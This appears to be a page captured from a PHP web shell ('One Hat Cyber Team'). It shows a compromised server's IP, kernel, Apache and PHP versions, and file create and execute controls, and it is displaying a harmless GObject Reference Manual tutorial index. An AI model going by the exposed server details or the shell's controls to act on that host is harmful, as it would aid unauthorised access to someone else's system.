⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.10
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
libgtk-3-doc
/
gobject
/
View File Name :
pt02.html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Part IV. Tutorial: GObject Reference Manual</title> <meta name="generator" content="DocBook XSL Stylesheets V1.79.1"> <link rel="home" href="index.html" title="GObject Reference Manual"> <link rel="up" href="index.html" title="GObject Reference Manual"> <link rel="prev" href="gobject-query.html" title="gobject-query"> <link rel="next" href="howto-gobject.html" title="How to define and implement a new GObject"> <meta name="generator" content="GTK-Doc V1.32 (XML mode)"> <link rel="stylesheet" href="style.css" type="text/css"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table class="navigation" id="top" width="100%" summary="Navigation header" cellpadding="2" cellspacing="5"><tr valign="middle"> <td width="100%" align="left" class="shortcuts"></td> <td><a accesskey="h" href="index.html"><img src="home.png" width="16" height="16" border="0" alt="Home"></a></td> <td><img src="up-insensitive.png" width="16" height="16" border="0"></td> <td><a accesskey="p" href="gobject-query.html"><img src="left.png" width="16" height="16" border="0" alt="Prev"></a></td> <td><a accesskey="n" href="howto-gobject.html"><img src="right.png" width="16" height="16" border="0" alt="Next"></a></td> </tr></table> <div class="part"> <div class="titlepage"><div><div><h1 class="title"> <a name="id-1.6"></a>Part IV. Tutorial</h1></div></div></div> <div class="partintro"> <div></div> <p> This chapter tries to answer the real-life questions of users and presents the most common use cases in order from most likely to least likely. </p> <div class="toc"> <p><b>Table of Contents</b></p> <dl class="toc"> <dt><span class="chapter"><a href="howto-gobject.html">How to define and implement a new GObject</a></span></dt> <dd><dl> <dt><span class="sect1"><a href="howto-gobject.html#howto-gobject-header">Boilerplate header code</a></span></dt> <dt><span class="sect1"><a href="howto-gobject-code.html">Boilerplate code</a></span></dt> <dt><span class="sect1"><a href="howto-gobject-construction.html">Object construction</a></span></dt> <dt><span class="sect1"><a href="howto-gobject-destruction.html">Object destruction</a></span></dt> <dt><span class="sect1"><a href="howto-gobject-methods.html">Object methods</a></span></dt> <dd><dl> <dt><span class="sect2"><a href="howto-gobject-methods.html#non-virtual-public-methods">Non-virtual public methods</a></span></dt> <dt><span class="sect2"><a href="howto-gobject-methods.html#virtual-public-methods">Virtual public methods</a></span></dt> <dt><span class="sect2"><a href="howto-gobject-methods.html#virtual-private-methods">Virtual private Methods</a></span></dt> </dl></dd> <dt><span class="sect1"><a href="howto-gobject-chainup.html">Chaining up</a></span></dt> </dl></dd> <dt><span class="chapter"><a href="howto-interface.html">How to define and implement interfaces</a></span></dt> <dd><dl> <dt><span class="sect1"><a href="howto-interface.html#howto-interface-define">Defining interfaces</a></span></dt> <dt><span class="sect1"><a href="howto-interface-implement.html">Implementing interfaces</a></span></dt> <dt><span class="sect1"><a href="howto-interface-prerequisite.html">Interface definition prerequisites</a></span></dt> <dt><span class="sect1"><a href="howto-interface-properties.html">Interface properties</a></span></dt> <dt><span class="sect1"><a href="howto-interface-override.html">Overriding interface methods</a></span></dt> </dl></dd> <dt><span class="chapter"><a href="howto-signals.html">How to create and use signals</a></span></dt> <dd><dl><dt><span class="sect1"><a href="howto-signals.html#howto-simple-signals">Simple use of signals</a></span></dt></dl></dd> </dl> </div> </div> </div> <div class="footer"> <hr>Generated by GTK-Doc V1.32</div> </body> </html>